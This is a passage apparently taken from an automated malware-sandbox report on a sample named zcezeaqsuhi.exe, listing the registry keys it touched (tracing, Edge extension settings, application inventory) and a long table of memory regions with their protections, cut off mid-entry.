There are 15 hidden IPs.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Target_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\cd738f7ec36d311b107bd6ec4b05793a
fc3dd79e7b07609d5d0d87b35c3f8091
HKEY_CURRENT_USER\SOFTWARE\cd738f7ec36d311b107bd6ec4b05793a
9F06F2D0565EA31B8A486D63B122AF45
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
state
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\ThirdParty
StatusCodes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\ThirdParty
StatusCodes
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
state
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\StabilityMetrics
user_experience_metrics.stability.exited_cleanly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7508
Terminator
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7508
Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\7508
CreationTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
ProgramId
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
FileId
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
LowerCaseLongPath
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
LongPathHash
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
Name
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
OriginalFileName
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
Publisher
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
Version
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
BinFileVersion
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
BinaryType
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
ProductName
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
ProductVersion
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
LinkDate
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
BinProductVersion
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
AppxPackageFullName
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
AppxPackageRelativeId
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
Size
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
Language
\REGISTRY\A\{f845474d-5e8f-2239-ee7d-b4001a437a90}\Root\InventoryApplicationFile\zcezeaqsuhi.exe|f0bfab4419a1d4db
Usn
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default
media.cdm.origin_data
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PrefsLightweight
lw_13bbe73648289fe96dfa1aa1bf23b3da
HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}
freseenversion
HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}
freseen
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\Defaults
is_dse_recommended
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\Defaults
is_startup_page_recommended
HKEY_CURRENT_USER\SOFTWARE\Microsoft\EdgeUpdate\ClientState\{56EB18F8-B008-4CBD-B6D2-8C97FE7E9062}
lastrun
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowProperties\66740
WindowTabManagerFileMappingId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Feeds
EdgeMUID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
ahfgeienlihckogmohjhadlkjgocpleb
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
dgiklkfkllikcanfonkcabmbdfmgleag
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\PreferenceMACs\Default\extensions.settings
fikbjbembnmfhppjfnmfkahdhfohhjmg

Memdumps

1CC77610000
trusted library allocation
page read and write
1D09B90D000
trusted library allocation
page read and write
1CC72FD0000
trusted library section
page readonly
1CC73331000
trusted library allocation
page read and write
2A5BB72A000
trusted library allocation
page read and write
19793900000
heap
page read and write
1DFC226B000
heap
page read and write
2A5B9960000
heap
page execute and read and write
C353FFE000
stack
page read and write
1CC77615000
trusted library allocation
page read and write
1D09B9FD000
trusted library allocation
page read and write
1CC773B0000
trusted library allocation
page read and write
1DFA98BC000
trusted library allocation
page read and write
7FFD9B7A0000
trusted library allocation
page read and write
1CC77440000
heap
page read and write
1D0ACDAB000
trusted library allocation
page read and write
1D09BCC8000
trusted library allocation
page read and write
1D099F45000
heap
page read and write
1D0AC6FB000
trusted library allocation
page read and write
20ED1A00000
heap
page read and write
1CC72FC0000
trusted library section
page readonly
1D0B429B000
heap
page read and write
1CC72900000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
1D0ACB71000
trusted library allocation
page read and write
2A5BB4F2000
heap
page read and write
1DFA7C15000
heap
page read and write
1D09BDD4000
trusted library allocation
page read and write
1CC776A0000
trusted library allocation
page read and write
7FFD9B752000
trusted library allocation
page read and write
1CC72580000
trusted library allocation
page read and write
1978E3B5000
heap
page read and write
1D0B403B000
heap
page read and write
C352F7E000
unkown
page readonly
1CC774ED000
heap
page read and write
1BDBD613000
heap
page read and write
923E7FE000
unkown
page readonly
1D0B43F0000
heap
page read and write
1DFA7A50000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1DFA7AE7000
heap
page read and write
7FFD9BBB9000
trusted library allocation
page read and write
1D0AC936000
trusted library allocation
page read and write
1DFA977C000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page execute and read and write
1D099D40000
heap
page read and write
EA42AAD000
stack
page read and write
1D09B923000
trusted library allocation
page read and write
1DFC2152000
heap
page read and write
7FFD9B80C000
trusted library allocation
page execute and read and write
1CC71E73000
heap
page read and write
C35307E000
unkown
page readonly
1D0AC422000
trusted library allocation
page read and write
1DFA9B0B000
trusted library allocation
page read and write
1978E2D0000
heap
page read and write
7FFD9B7DC000
trusted library allocation
page execute and read and write
1DFA9AAD000
trusted library allocation
page read and write
1CC71DF0000
heap
page read and write
1CC7768E000
trusted library allocation
page read and write
74625F7000
stack
page read and write
1CC774C1000
heap
page read and write
7FFD9B930000
trusted library allocation
page read and write
1DFA9AD5000
trusted library allocation
page read and write
2487F623000
unkown
page read and write
1DFA7A70000
heap
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
2A5BB430000
heap
page read and write
1DFC1EFE000
heap
page read and write
1CC776BA000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page read and write
1CC77461000
heap
page read and write
1CC77360000
trusted library allocation
page read and write
1CC72600000
heap
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
7FFD9BAD0000
trusted library allocation
page read and write
1CC77383000
trusted library allocation
page read and write
1D09BABE000
trusted library allocation
page read and write
1DFA9731000
trusted library allocation
page read and write
1D0B411B000
heap
page read and write
1D09BC5F000
trusted library allocation
page read and write
1CC7748E000
heap
page read and write
1D09BA44000
trusted library allocation
page read and write
1CC7271B000
heap
page read and write
1D0ABD54000
trusted library allocation
page read and write
1DFC230A000
heap
page read and write
1D0AC461000
trusted library allocation
page read and write
7FFD9BA7B000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page read and write
2487F900000
heap
page read and write
1CC773E1000
trusted library allocation
page read and write
1CC77515000
heap
page read and write
1DFC1EA1000
heap
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
1DFA9647000
trusted library allocation
page read and write
1D09BE46000
trusted library allocation
page read and write
7FFD9B753000
trusted library allocation
page execute and read and write
1DFA9AE9000
trusted library allocation
page read and write
1D09BBFF000
trusted library allocation
page read and write
2487F63B000
heap
page read and write
1D0ABC95000
trusted library allocation
page read and write
2487F913000
heap
page read and write
1DFA97BD000
trusted library allocation
page read and write
20ED19B0000
trusted library allocation
page read and write
1DFC1F8A000
heap
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1CC72010000
heap
page read and write
1BDBD5F0000
trusted library allocation
page read and write
1DFA9A5C000
trusted library allocation
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
1D099EE3000
trusted library allocation
page read and write
1DFC2170000
heap
page read and write
1D09B9C4000
trusted library allocation
page read and write
1DFC22DA000
heap
page read and write
1DFA9A03000
trusted library allocation
page read and write
1CC774E0000
heap
page read and write
1DFA99FC000
trusted library allocation
page read and write
20ED2202000
trusted library allocation
page read and write
1DFA99D3000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
B8C607E000
unkown
page readonly
7FFD9BA40000
trusted library allocation
page execute and read and write
1CC72EB0000
trusted library allocation
page read and write
1CC776A3000
trusted library allocation
page read and write
C352EFE000
stack
page read and write
1CC71E78000
heap
page read and write
923E8FE000
stack
page read and write
7FFD9B78B000
trusted library allocation
page execute and read and write
1CC776E5000
trusted library allocation
page read and write
74601FE000
stack
page read and write
1D0B4005000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
1D0ABB78000
trusted library allocation
page read and write
1D09BBC5000
trusted library allocation
page read and write
1CC7275C000
heap
page read and write
2A5B99FE000
heap
page read and write
1CC71E9F000
heap
page read and write
19792F00000
heap
page read and write
1CC7751D000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1DFA976F000
trusted library allocation
page read and write
20ED1A6E000
heap
page read and write
1D0B44A2000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
1CC71E22000
heap
page read and write
1CC7766F000
trusted library allocation
page read and write
1DFC2361000
heap
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
7FFD9BA78000
trusted library allocation
page read and write
2487F490000
heap
page read and write
7FFD9BA8B000
trusted library allocation
page read and write
1D099BAB000
heap
page read and write
1CC77656000
trusted library allocation
page read and write
7FFD9B91D000
trusted library allocation
page read and write
1D0B45AF000
heap
page read and write
1DFA9844000
trusted library allocation
page read and write
7FFD9BB10000
trusted library allocation
page read and write
1D0B3FA0000
heap
page read and write
1CC71F02000
heap
page read and write
7FFD9B9C4000
trusted library allocation
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
D1D51FE000
stack
page read and write
1DFC2158000
heap
page read and write
1CC77770000
remote allocation
page read and write
1CC7275C000
heap
page read and write
20ED1B35000
heap
page read and write
D1D65FF000
stack
page read and write
7FFD9BA76000
trusted library allocation
page read and write
1DFA7930000
heap
page read and write
1CC77520000
heap
page read and write
1DFA7B11000
heap
page read and write
1DFA9851000
trusted library allocation
page read and write
44A33FF000
stack
page read and write
7FFD9BA50000
trusted library allocation
page execute and read and write
1D0AC63D000
trusted library allocation
page read and write
1DFC1F99000
heap
page read and write
1D0B4121000
heap
page read and write
1D0B3FC6000
heap
page read and write
7FFD9B996000
trusted library allocation
page read and write
2A5B9A02000
heap
page read and write
3C1DCFC000
stack
page read and write
1D09BD68000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page read and write
1CC779D0000
trusted library allocation
page read and write
1D09BE26000
trusted library allocation
page read and write
2A5B9BE5000
heap
page read and write
B8C5D7E000
stack
page read and write
1DFB9511000
trusted library allocation
page read and write
1D09BD6E000
trusted library allocation
page read and write
1D0ACD4F000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1DFA7802000
unkown
page readonly
D1D71FD000
stack
page read and write
C35347E000
unkown
page readonly
1D099F4B000
heap
page read and write
1D09BD0F000
trusted library allocation
page read and write
1D0ABC36000
trusted library allocation
page read and write
1CC77600000
trusted library allocation
page read and write
1D0B4515000
heap
page read and write
2A5B9880000
heap
page read and write
1CC77720000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1BDBD602000
heap
page read and write
1D0B404F000
heap
page read and write
1D0B452B000
heap
page read and write
1D099B86000
heap
page read and write
D1D61FE000
stack
page read and write
C35287E000
unkown
page readonly
1D0B4108000
heap
page read and write
7FFD9B902000
trusted library allocation
page read and write
1D09BBE5000
trusted library allocation
page read and write
7FFD9B77A000
trusted library allocation
page read and write
1CC77664000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
1DFA9AE2000
trusted library allocation
page read and write
1CC7750C000
heap
page read and write
1D09BD2F000
trusted library allocation
page read and write
2487F613000
unkown
page read and write
2A5B98C0000
heap
page read and write
1CC77454000
heap
page read and write
1DFC2126000
heap
page read and write
745D5E2000
stack
page read and write
1DFC20C7000
heap
page read and write
1DFA9A1E000
trusted library allocation
page read and write
1DFC1F10000
trusted library section
page read and write
1978FC31000
heap
page read and write
1D09BC0F000
trusted library allocation
page read and write
2A5B99E8000
heap
page read and write
1DFC2366000
heap
page read and write
1CC773D0000
trusted library allocation
page read and write
1978E3BD000
heap
page read and write
2A5BB726000
trusted library allocation
page read and write
1D09B8D3000
trusted library allocation
page read and write
D1D75FE000
stack
page read and write
7FFD9B9B8000
trusted library allocation
page read and write
1D099AA0000
heap
page read and write
C35367E000
unkown
page readonly
2487F700000
trusted library allocation
page read and write
1D09BBBF000
trusted library allocation
page read and write
7FFD9B790000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
7FFD9B830000
trusted library allocation
page read and write
1DFA7AA0000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
1D0ABCF5000
trusted library allocation
page read and write
1DFC1E04000
heap
page read and write
1D09B690000
heap
page execute and read and write
2A5B99FC000
heap
page read and write
1CC7742C000
heap
page read and write
C352B7B000
stack
page read and write
7FFD9B764000
trusted library allocation
page read and write
2A5B98A0000
heap
page read and write
1978FC29000
heap
page read and write
20ED1A65000
heap
page read and write
7FFD9B754000
trusted library allocation
page read and write
1DFC1F9D000
heap
page read and write
1978E1B0000
heap
page read and write
1CC774BF000
heap
page read and write
1CC71F13000
heap
page read and write
1D09B8B9000
trusted library allocation
page read and write
7FFD9B9DD000
trusted library allocation
page read and write
1D0AB96C000
trusted library allocation
page read and write
1DFC230F000
heap
page read and write
923E9FE000
unkown
page readonly
1D0AC75B000
trusted library allocation
page read and write
1D0AC520000
trusted library allocation
page read and write
1D0ACDAE000
trusted library allocation
page read and write
1D099CC0000
heap
page read and write
1D09BC70000
trusted library allocation
page read and write
1D0AC383000
trusted library allocation
page read and write
1D0AB6C1000
trusted library allocation
page read and write
1D0B432A000
heap
page read and write
1CC774BF000
heap
page read and write
7FFD9BB9B000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
1D0ACCED000
trusted library allocation
page read and write
1CC72C40000
trusted library allocation
page read and write
1DFA975B000
trusted library allocation
page read and write
1D09B9A4000
trusted library allocation
page read and write
1CC776C2000
trusted library allocation
page read and write
1CC773C0000
trusted library allocation
page read and write
1CC7745A000
heap
page read and write
1D09BBCA000
trusted library allocation
page read and write
1D09BE42000
trusted library allocation
page read and write
1CC77618000
trusted library allocation
page read and write
1D0ACE0A000
trusted library allocation
page read and write
1D09BD04000
trusted library allocation
page read and write
7FFD9B836000
trusted library allocation
page read and write
1D09B8BD000
trusted library allocation
page read and write
2A5BB551000
trusted library allocation
page read and write
1CC71E95000
heap
page read and write
7FFD9B760000
trusted library allocation
page read and write
1D0AB9FB000
trusted library allocation
page read and write
1DFA97E5000
trusted library allocation
page read and write
1D0B456F000
heap
page read and write
1DFA7800000
unkown
page readonly
1D0AB8C3000
trusted library allocation
page read and write
1D0ABDB3000
trusted library allocation
page read and write
1DFA9A7E000
trusted library allocation
page read and write
1DFA7C1E000
heap
page read and write
7FFD9B783000
trusted library allocation
page execute and read and write
1CC71E2B000
heap
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
1DFA97C3000
trusted library allocation
page read and write
1DFA7A75000
heap
page read and write
1D0AC4C0000
trusted library allocation
page read and write
1DFA9904000
trusted library allocation
page read and write
1DFA9AA7000
trusted library allocation
page read and write
1CC774FD000
heap
page read and write
1D09B913000
trusted library allocation
page read and write
1DFA980C000
trusted library allocation
page read and write
1CC776F4000
trusted library allocation
page read and write
1D0B3FAA000
heap
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
7FFD9B9D0000
trusted library allocation
page read and write
1DFA93CD000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1D0ACAB3000
trusted library allocation
page read and write
1D09BC1F000
trusted library allocation
page read and write
1CC774F1000
heap
page read and write
1DFC1FC7000
heap
page read and write
19790700000
heap
page read and write
1DFC2280000
heap
page read and write
2A5BB4ED000
heap
page read and write
1CC7764D000
trusted library allocation
page read and write
1D09BC6B000
trusted library allocation
page read and write
1DFC2347000
heap
page read and write
2487F570000
trusted library allocation
page read and write
1DFA96DA000
trusted library allocation
page read and write
1D0AB97C000
trusted library allocation
page read and write
7FFD9BA7F000
trusted library allocation
page read and write
C352779000
stack
page read and write
1CC776E8000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
2A5BB6A5000
trusted library allocation
page read and write
1D099BEA000
heap
page read and write
1D0B4015000
heap
page read and write
1DFC1FC1000
heap
page read and write
7FF4233A0000
trusted library allocation
page execute and read and write
1D0B40F0000
heap
page read and write
D1D6DF7000
stack
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
7FFD9B964000
trusted library allocation
page read and write
1CC71E13000
heap
page read and write
1CC77400000
heap
page read and write
2A5BB498000
heap
page read and write
1CC7271B000
heap
page read and write
1CC71E7C000
heap
page read and write
1DFA9B3E000
trusted library allocation
page read and write
1CC776F1000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page read and write
3C1E1FE000
stack
page read and write
1CC7271B000
heap
page read and write
1D0ACF86000
trusted library allocation
page read and write
1D0ABB18000
trusted library allocation
page read and write
1D0AC995000
trusted library allocation
page read and write
1DFC2138000
heap
page read and write
2A5D4640000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
1D0AC69C000
trusted library allocation
page read and write
C3533FE000
stack
page read and write
D1D81FB000
stack
page read and write
1DFA9997000
trusted library allocation
page read and write
745F1FE000
stack
page read and write
1D09BA4B000
trusted library allocation
page read and write
1D0ACDCE000
trusted library allocation
page read and write
7FFD9B83C000
trusted library allocation
page execute and read and write
2487F702000
trusted library allocation
page read and write
D1D69FE000
stack
page read and write
44A2BFC000
stack
page read and write
1D0B4210000
heap
page read and write
1D09BC50000
trusted library allocation
page read and write
1DFC1E3C000
heap
page read and write
2A5B9BC0000
trusted library allocation
page read and write
1D0B424D000
heap
page read and write
1DFC227E000
heap
page read and write
1DFA9A11000
trusted library allocation
page read and write
1D0B4081000
heap
page read and write
1D0B41F0000
heap
page read and write
2487F602000
unkown
page read and write
1DFC1540000
trusted library allocation
page read and write
1CC78000000
heap
page read and write
7FFD9B810000
trusted library allocation
page execute and read and write
1DFC2117000
heap
page read and write
1D0B402C000
heap
page read and write
1D0B439F000
heap
page read and write
7FFD9B934000
trusted library allocation
page read and write
2A5BB4B3000
heap
page read and write
1DFA9AC7000
trusted library allocation
page read and write
7FFD9B9D7000
trusted library allocation
page read and write
2A5B9A7E000
heap
page read and write
1D0AB805000
trusted library allocation
page read and write
1DFC1FB8000
heap
page read and write
1CC7752F000
heap
page read and write
1D099EE0000
trusted library allocation
page read and write
1DFC1F80000
heap
page read and write
1DFC2206000
heap
page read and write
1D0B4134000
heap
page read and write
7FFD9B7A4000
trusted library allocation
page read and write
1D0B43CA000
heap
page read and write
7FFD9BAB2000
trusted library allocation
page read and write
1D099BF3000
heap
page read and write
1DFC20BC000
heap
page read and write
1DFA7ACB000
heap
page read and write
1BDBD62B000
heap
page read and write
1D0B40FA000
heap
page read and write
1DFC1E20000
heap
page read and write
1D0B43B8000
heap
page read and write
1D09BA1D000
trusted library allocation
page read and write
1CC73350000
trusted library allocation
page read and write
2487F802000
heap
page read and write
1DFC1E51000
heap
page read and write
2487F813000
heap
page read and write
C35257E000
stack
page read and write
7FFD9BB30000
trusted library allocation
page read and write
2A5B9A63000
heap
page read and write
1CC779C0000
trusted library allocation
page read and write
1D0B4391000
heap
page read and write
1CC77465000
heap
page read and write
1BDBD5C0000
heap
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
1D09BDD8000
trusted library allocation
page read and write
1D0B409E000
heap
page read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
C351D8B000
stack
page read and write
1D099C76000
heap
page read and write
1CC7741F000
heap
page read and write
7FFD9B978000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
1DFC1E94000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
2A5BB73E000
trusted library allocation
page read and write
1DFA7ACE000
heap
page read and write
1D09BA23000
trusted library allocation
page read and write
1DFC1E00000
heap
page read and write
1DFC21D5000
heap
page read and write
1D099F23000
heap
page execute and read and write
C3530FE000
stack
page read and write
1D09BC8F000
trusted library allocation
page read and write
C35317E000
unkown
page readonly
2A5BB6FB000
trusted library allocation
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
1D0B4152000
heap
page read and write
1D0ACFE5000
trusted library allocation
page read and write
1D099CA0000
heap
page read and write
1DFA9962000
trusted library allocation
page read and write
7FFD9B9FD000
trusted library allocation
page read and write
1DFA94E0000
heap
page execute and read and write
1D09BBCF000
trusted library allocation
page read and write
1CC776FC000
trusted library allocation
page read and write
1D09B984000
trusted library allocation
page read and write
C352D7B000
stack
page read and write
1DFC218D000
heap
page read and write
44A1BE1000
stack
page read and write
2A5B9920000
trusted library allocation
page read and write
20ED1A2B000
heap
page read and write
1D09BC80000
trusted library allocation
page read and write
1CC773E0000
trusted library allocation
page read and write
1DFC20EA000
heap
page read and write
745F5F7000
stack
page read and write
1DFA98E0000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
1DFC22C2000
heap
page read and write
1DFA9918000
trusted library allocation
page read and write
1D09BC05000
trusted library allocation
page read and write
1D0B4337000
heap
page read and write
1D0B4126000
heap
page read and write
1D0B4350000
heap
page read and write
1D099C80000
heap
page read and write
1D0B4007000
heap
page read and write
1CC7275C000
heap
page read and write
7FFD9BA45000
trusted library allocation
page read and write
1D0B43FB000
heap
page read and write
19792500000
heap
page read and write
1CC77519000
heap
page read and write
1D0ACC2F000
trusted library allocation
page read and write
1D099B8C000
heap
page read and write
7FFD9B806000
trusted library allocation
page read and write
1DFC2147000
heap
page read and write
7FFD9B810000
trusted library allocation
page read and write
1D0B448F000
heap
page read and write
1DFA9ADB000
trusted library allocation
page read and write
1978E39C000
heap
page read and write
1DFA7A10000
heap
page read and write
1DFA9829000
trusted library allocation
page read and write
1D0B4471000
heap
page read and write
C352C7E000
unkown
page readonly
7FFD9B9D0000
trusted library allocation
page read and write
1DFA7AA6000
heap
page read and write
7FFD9BA0A000
trusted library allocation
page read and write
2487F800000
heap
page read and write
1D0AB766000
trusted library allocation
page read and write
2A5BB70F000
trusted library allocation
page read and write
1DFC20C3000
heap
page read and write
1D09B944000
trusted library allocation
page read and write
1BDBD702000
heap
page read and write
1D09B6B0000
heap
page read and write
7FFD9B75D000
trusted library allocation
page execute and read and write
1CC77608000
trusted library allocation
page read and write
1DFC233F000
heap
page read and write
7FFD9B800000
trusted library allocation
page read and write
1D0B43A2000
heap
page read and write
1DFC1EF2000
heap
page read and write
1DFA966F000
trusted library allocation
page read and write
1CC774ED000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1DFA9500000
heap
page read and write
7FFD9B792000
trusted library allocation
page read and write
1DFC2102000
heap
page read and write
1D09BD98000
trusted library allocation
page read and write
2A5B9BB0000
trusted library allocation
page read and write
1D09B9DD000
trusted library allocation
page read and write
2A5B9970000
heap
page read and write
1CC77502000
heap
page read and write
1D0AC878000
trusted library allocation
page read and write
44A27FF000
stack
page read and write
1CC77710000
trusted library allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
1CC77610000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
1D0B4507000
heap
page read and write
1D0B411E000
heap
page read and write
7FFD9BA50000
trusted library allocation
page execute and read and write
1D09BD54000
trusted library allocation
page read and write
7FFD9B7BC000
trusted library allocation
page execute and read and write
1D0B44BC000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
1DFC20D6000
heap
page read and write
1CC72713000
heap
page read and write
D1D46FD000
stack
page read and write
1DFC2332000
heap
page read and write
1404FC000
remote allocation
page execute and read and write
1CC72700000
heap
page read and write
1CC776FF000
trusted library allocation
page read and write
C35407E000
unkown
page readonly
7FF44CBB0000
trusted library allocation
page execute and read and write
20ED1B13000
heap
page read and write
1DFA9A8C000
trusted library allocation
page read and write
74629FA000
stack
page read and write
7FFD9B79D000
trusted library allocation
page execute and read and write
1D0B412A000
heap
page read and write
B8C59FB000
stack
page read and write
1DFA9B25000
trusted library allocation
page read and write
1CC71E90000
heap
page read and write
1D0B42C9000
heap
page read and write
1CC77508000
heap
page read and write
1D099B80000
heap
page read and write
D1D5DFB000
stack
page read and write
1CC72FB0000
trusted library section
page readonly
7FFD9BB20000
trusted library allocation
page read and write
1DFA9931000
trusted library allocation
page read and write
1D099F40000
heap
page read and write
1DFC22CF000
heap
page read and write
1978FD00000
heap
page read and write
1DFA98DB000
trusted library allocation
page read and write
1DFC1FE5000
heap
page read and write
1D0ACEC8000
trusted library allocation
page read and write
1D0AB7A5000
trusted library allocation
page read and write
1DFB96FF000
trusted library allocation
page read and write
19794300000
heap
page read and write
1DFC1E32000
heap
page read and write
1DFA7AE3000
heap
page read and write
1D09B8A3000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
1CC773E6000
trusted library allocation
page read and write
1DFA995B000
trusted library allocation
page read and write
1D09B9B4000
trusted library allocation
page read and write
1DFA9615000
trusted library allocation
page read and write
2A5D4630000
heap
page read and write
745E9FF000
stack
page read and write
1D0B4810000
heap
page execute and read and write
2A5BB51E000
heap
page read and write
1CC77707000
trusted library allocation
page read and write
1D09B899000
trusted library allocation
page read and write
7FFD9B900000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1D0ABA5A000
trusted library allocation
page read and write
923EAFE000
stack
page read and write
7FF44CBD0000
trusted library allocation
page execute and read and write
7FFD9B7AD000
